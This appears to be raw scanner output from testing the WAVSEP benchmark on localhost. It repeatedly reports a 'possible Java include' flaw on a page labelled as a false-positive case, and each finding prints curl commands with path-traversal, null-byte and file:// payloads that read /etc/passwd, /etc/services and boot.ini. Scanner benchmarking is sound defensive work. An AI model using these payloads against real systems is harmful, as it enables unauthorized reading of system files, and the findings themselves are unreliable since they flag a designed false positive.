curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
